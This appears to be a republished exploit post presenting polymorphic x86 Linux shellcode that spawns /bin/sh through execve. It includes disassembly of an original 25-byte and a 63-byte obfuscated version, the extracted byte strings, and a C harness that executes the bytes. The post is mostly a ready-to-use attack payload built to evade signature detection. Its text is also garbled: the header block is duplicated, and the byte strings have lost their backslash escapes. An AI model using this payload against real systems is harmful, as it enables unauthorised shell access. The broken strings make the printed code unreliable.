Polymorphic execve bibn sh Shellcode

Details: Written by: khalil shreateh; Category: Vulnerabilities; Hits: 255

/*
; Date: 09/03/2019
; Polymorphic_Execve_Sh_Stack.asm
; Author: Daniele Votta
; Description: This program invoke a Polimorphic version of excve.

Original Execve_Sh /*
; Date: 09/03/2019
; Polymorphic_Execve_Sh_Stack.asm
; Author: Daniele Votta
; Description: This program invoke a Polimorphic version of excve.

Original Execve_Sh_Stack: file format elf32-i386
Disassembly of section .text:

08048080 <_start>:
8048080: 31 c0 xor eax,eax
8048082: 50 push eax
8048083: 68 2f 2f 73 68 push 0x68732f2f
8048088: 68 2f 62 69 6e push 0x6e69622f
804808d: 89 e3 mov ebx,esp
804808f: 50 push eax
8048090: 89 e2 mov edx,esp
8048092: 53 push ebx
8048093: 89 e1 mov ecx,esp
8048095: b0 0b mov al,0xb
8048097: cd 80 int 0x80

[+] Extract Shellcode ...
"x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80"

Shellcode Length:25

======================= POC Daniele Votta =======================

Polimorphic_Execve_Sh_Stack: file format elf32-i386

Disassembly of section .text:

08048080 <_start>:
8048080: 31 c3 xor ebx,eax
8048082: 31 d8 xor eax,ebx
8048084: 89 c1 mov ecx,eax
8048086: 51 push ecx
8048087: bf 40 40 84 79 mov edi,0x79844040
804808c: 81 ef 11 11 11 11 sub edi,0x11111111
8048092: 89 7c 24 fc mov DWORD PTR [esp-0x4],edi
8048096: bf 2f 62 69 6e mov edi,0x6e69622f
804809b: 81 c7 11 11 11 11 add edi,0x11111111
80480a1: 81 ef 11 11 11 11 sub edi,0x11111111
80480a7: 89 7c 24 f8 mov DWORD PTR [esp-0x8],edi
80480ab: 83 ec 04 sub esp,0x4
80480ae: 83 ec 04 sub esp,0x4
80480b1: 89 e3 mov ebx,esp
80480b3: 50 push eax
80480b4: 89 e2 mov edx,esp
80480b6: 53 push ebx
80480b7: 89 e1 mov ecx,esp
80480b9: b0 01 mov al,0x1
80480bb: 04 0a add al,0xa
80480bd: cd 80 int 0x80

[+] Extract Shellcode ...
"x31xc3x31xd8x89xc1x51xbfx40x40x84x79x81xefx11x11x11x11x89x7cx24xfcxbfx2fx62x69x6ex81xc7x11x11x11x11x81xefx11x11x11x11x89x7cx24xf8x83xecx04x83xecx04x89xe3x50x89xe2x53x89xe1xb0x01x04x0axcdx80"

Shellcode Length:63

======================= POC Daniele Votta =======================
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] =
"x31xc3x31xd8x89xc1x51xbfx40x40x84x79x81xefx11x11x11x11x89x7cx24xfcxbfx2fx62x69x6ex81xc7x11x11x11x11x81xefx11x11x11x11x89x7cx24xf8x83xecx04x83xecx04x89xe3x50x89xe2x53x89xe1xb0x01x04x0axcdx80";

int main()
{
printf("Shellcode Length: %d ", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}